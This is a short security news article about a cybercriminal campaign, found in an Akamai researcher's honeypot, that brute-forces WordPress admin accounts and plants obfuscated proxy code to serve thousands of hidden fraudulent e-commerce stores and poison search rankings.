A new cybercriminal group attacks WordPress sites and installs hidden e-commerce stores on them, taking advantage of the site’s search rankings and reputation for fraudulent purposes.
The attacks were discovered earlier this month when malware hit the honeypot of Akamai security specialist Larry Cashdollar. As he said, the attackers have access to administrative accounts sites using brute force attacks, and then rewrite their main index files and add malicious code.
Although the malicious code is heavily obfuscated, Cashdollar was able to figure out that its main purpose was to act as a proxy to redirect all incoming traffic to a C&C server controlled by cybercriminals.
A typical attack looks like this: when a user wants to visit a compromised site, his request is redirected to the C&C server. If the user meets certain criteria, the C&C server instructs the site to respond to the request by sending an HTML file with an online store offering household goods. That is, instead of the legitimate site requested by the user, a fraudulent online store opens. According to the researcher, at the time the malware got into its honeypot, the attackers installed more than 7 thousand e-commerce stores on the compromised resources.
Among other things, hackers also generate XML maps of compromised sites containing fake store entrances along with the original pages. The attackers generate a sitemap, submit it to a Google search engine, and then delete it to avoid detection.
While this procedure looks harmless enough, it actually has a pretty big impact on WordPress sites, as it poisons their keywords with unrelated and fraudulent entries that lower their search engine result page (SERP) rankings.
According to Cashdollar, this type of malware could be used in SEO-related ransomware schemes, in which cybercriminals deliberately change a site’s search engine rankings and then ask for a ransom to remedy the consequences.